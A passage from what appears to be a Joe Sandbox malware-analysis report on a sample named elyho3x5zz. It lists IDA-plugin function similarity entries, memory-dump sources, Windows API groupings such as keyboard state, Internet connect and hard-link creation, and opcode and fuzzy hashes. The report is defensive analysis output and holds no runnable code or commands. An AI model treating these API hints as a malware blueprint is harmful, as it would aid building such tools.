      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
      • Instruction ID: fe75f631e098aba374e5d349f249d8435d69e77736fd84a5e652c63918bf675d
      • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
      • Instruction Fuzzy Hash: 7DD1466AB04B55D6EB14DF26C4512AC77B1FB89F88B514462EF4E47B98CF3AD840E320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClearVariant
      • String ID:
      • API String ID: 1473721057-0
      • Opcode ID: 38b5b4059fbeeea70ae4dbf43d28609176965b01b008002529cf37a00efc29dc
      • Instruction ID: 33a93c838b3a4db4a206beba286525e10ea3c7dc7c7f7a47e1ef366beefdf0d9
      • Opcode Fuzzy Hash: 38b5b4059fbeeea70ae4dbf43d28609176965b01b008002529cf37a00efc29dc
      • Instruction Fuzzy Hash: 95D16E6AB05B41AAFB10EF64E4821ECB371FB94788B8040B5DE0D57BA9DF38D415E390
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$ClientMessageMoveRectScreenSend
      • String ID:
      • API String ID: 1249313431-0
      • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
      • Instruction ID: 0f70f274a93b3abeb2ff87623e9182ee193d22d35c06d0a546f3d1a36969c198
      • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
      • Instruction Fuzzy Hash: 6151343AA046429AFB10DF25D4816BD7361FBC4B98F904272DE2D43784DF3AE981E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CreateDirectory$AttributesErrorFileLast
      • String ID:
      • API String ID: 2267087916-0
      • Opcode ID: 9a50aa74d2559c0d1d2fc8bb5d1523606716f977cfdc5cafbc327c2c6a102045
      • Instruction ID: e3aa3c1ac93fe97a13cece46bf41b5159800946e6346d1cc475cd998779fd19c
      • Opcode Fuzzy Hash: 9a50aa74d2559c0d1d2fc8bb5d1523606716f977cfdc5cafbc327c2c6a102045
      • Instruction Fuzzy Hash: 6151F326B09A21A9FF10AF66D8814ACA3B5FB84BD4F944171EE0D53798DF3CD542E320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CreateHardLink$DeleteErrorFileLast
      • String ID:
      • API String ID: 3321077145-0
      • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
      • Instruction ID: 128b34b057b3edf162da56071429579733ce0543b7a3a3104fb291d318577bde
      • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
      • Instruction Fuzzy Hash: A641EC6A604B4691EB14EF26E49206DB7A0FB88FD0B889472DF4E47766CF3CE440A350
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Rect$BeepClientMessageScreenWindow
      • String ID:
      • API String ID: 1352109105-0
      • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
      • Instruction ID: e9e279217e8266ee7b1b333dfc72d45875a3eac9b787849a34920bb91909c465
      • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
      • Instruction Fuzzy Hash: 3941A23AA0CA46A5FA10AF19D886279B3A0FBC4B84F954171CE6D83361DF39E941F710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Menu$Item$DrawInfoInsert
      • String ID:
      • API String ID: 3076010158-0
      • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
      • Instruction ID: 2f1e58f26c91f196a4c9523e0fadf13398f3f756890019a086693f6bc08a969b
      • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
      • Instruction Fuzzy Hash: 1D41CC3AA04A419AFB109F62D4422AD77A2FB84BA4F914076CE0D13754CF3AE981E790
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
      • String ID:
      • API String ID: 4141327611-0
      • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
      • Instruction ID: de3696eff82076a0048522eb601dcf08714ca8c19ee33ea0950fef758946ed16
      • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
      • Instruction Fuzzy Hash: 5441B8BAA0C74266FB65FB10D04A379E6B4EFC0B90F948170DA4946AD5DF3CD841B722
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: KeyboardState$InputMessagePostSend
      • String ID:
      • API String ID: 432972143-0
      • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
      • Instruction ID: 77a93c786f471cacc52ccde736e209c3ef36d8e2724e94e52135a8290f2c53a4
      • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
      • Instruction Fuzzy Hash: E4415D66A2C6A265F734DB21E011679A7A0FBC5F90F940571EE9A136D4CF3CD481F720
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: KeyboardState$InputMessagePostSend
      • String ID:
      • API String ID: 432972143-0
      • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
      • Instruction ID: 7fc94c919239c1e8d7021efeea0d3934e6ce98adc90a716e3af63bb594c7372a
      • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
      • Instruction Fuzzy Hash: 9D311625A1DEA1A6F730AB3194017B9ABE0FB98B50F950171DE9903795CF3CD441F710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Internet$CloseConnectHandleOpen
      • String ID:
      • API String ID: 1463438336-0
      • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
      • Instruction ID: c82d3020cd165372997f20b0685676877d2b564e5feea89156ee84f1954363f0
      • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
      • Instruction Fuzzy Hash: 2031B2BAA0878292FB28EB16E056779E360FF89B84F440275DA4D07B44DF2CD045AB10
      APIs
      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF73A20A27B,?,?,?,00007FF73A20A236), ref: 00007FF73A213DB1
      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF73A20A27B,?,?,?,00007FF73A20A236), ref: 00007FF73A213E13
      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF73A20A27B,?,?,?,00007FF73A20A236), ref: 00007FF73A213E4D
      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF73A20A27B,?,?,?,00007FF73A20A236), ref: 00007FF73A213E77
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ByteCharEnvironmentMultiStringsWide$Free
      • String ID:
      • API String ID: 1557788787-0
      • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
      • Instruction ID: a457472f21c6784348ea45dacaf0939634a4c583d00e8d0c60cf532537a30368
      • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
      • Instruction Fuzzy Hash: 99218125F1879191F660AF126841429F6A5FF94FD0F884174DE8E63BD9DF3CE452A310
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$Long
      • String ID:
      • API String ID: 847901565-0
      • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
      • Instruction ID: cbdc9103a8bce21ad349cffc54454ddb7a954b7a50fcf3f98e2a7b8185cd5b00
      • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
      • Instruction Fuzzy Hash: 9621C025A0CB41A5FA10AB259981339B790EFC4BA0F954270EE7E47BE5CF3DE542E310
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Cursor$LongMenuPopupProcTrackWindow
      • String ID:
      • API String ID: 2864067406-0
      • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
      • Instruction ID: 8fc641f173b047fd5337ed08b4c02ebdf7ba2f93fc7c45a5a16ae3960e1855ed
      • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
      • Instruction Fuzzy Hash: A331702AA08A4595FB10EB15E4963B9E364FBC4F94F940171EA4D83BA8CF3CD445E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: lstrcmpilstrcpylstrlen
      • String ID: cdecl
      • API String ID: 4031866154-3896280584
      • Opcode ID: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
      • Instruction ID: ccc2603816f460dafef979c97b0087a5769272ef47beffbed5ad9296ce3ad65b
      • Opcode Fuzzy Hash: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
      • Instruction Fuzzy Hash: D221D32570875299FB10BF16A455178B361EF98FD0B884174EB9E47390DF7DE440E314
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CreateMessageObjectSendStockWindow
      • String ID:
      • API String ID: 3970641297-0
      • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
      • Instruction ID: 14cbb0d812402e3f2c058a69fe77d4dedc6f3b9beade85f44aafab39f4b05616
      • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
      • Instruction Fuzzy Hash: 652160366087C59AE7A49F25F8457AAB7A0FB88780F840135DA8D43B58DF3CD484DB00
      APIs
        • Part of subcall function 00007FF73A1D2A54: GetWindowLongPtrW.USER32 ref: 00007FF73A1D2A71
      • GetClientRect.USER32(?,?,?,?,?,00007FF73A21AA36,?,?,?,?,?,?,?,?,?,00007FF73A1D27AF), ref: 00007FF73A2822C4
      • GetCursorPos.USER32(?,?,?,?,?,00007FF73A21AA36,?,?,?,?,?,?,?,?,?,00007FF73A1D27AF), ref: 00007FF73A2822CF
      • ScreenToClient.USER32 ref: 00007FF73A2822DD
      • DefDlgProcW.USER32(?,?,?,?,?,00007FF73A21AA36,?,?,?,?,?,?,?,?,?,00007FF73A1D27AF), ref: 00007FF73A28231F
        • Part of subcall function 00007FF73A27E894: LoadCursorW.USER32 ref: 00007FF73A27E945
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClientCursor$LoadLongProcRectScreenWindow
      • String ID:
      • API String ID: 1626762757-0
      • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
      • Instruction ID: 41087acc24f0ec4ae921aa4cc359e77646be9604761ad6ae09536e8539bbb3c5
      • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
      • Instruction Fuzzy Hash: 19213239A0864296FA18EB05F492169B364FBC4F80F940171EB5D87B59CF3CE941E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
      • String ID:
      • API String ID: 2979156933-0
      • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
      • Instruction ID: e6323be3cb7a57a6ea48a6010c1ea1bf6568a7936a1343a39c89b3dfd6db242c
      • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
      • Instruction Fuzzy Hash: 3F21D136A0C7819AF720EB26A84226AB791BBC4BD4F844275ED9D43B69CF3CD405A750
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _ctrlfp
      • String ID:
      • API String ID: 697997973-0
      • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
      • Instruction ID: 61b6b85bcccfe1da18d0e81afbd747c80958565bd5eff6b3d9faff86eacc8e33
      • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
      • Instruction Fuzzy Hash: 9C110B2AD0C54192F210EB38904307BD372FFDA780FA44231FB8946A95DF2DD440BB01
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClientRectScreen$InvalidateWindow
      • String ID:
      • API String ID: 357397906-0
      • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
      • Instruction ID: ce3059fb1ef08af58ff0a1a1435f1ff3bd3426f4ffe67555f1f39a1a28b14b58
      • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
      • Instruction Fuzzy Hash: 172108BAA04741EFEB00DF74D84419C77B0F788B48B404866EE5893B18DB78D654DB50
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
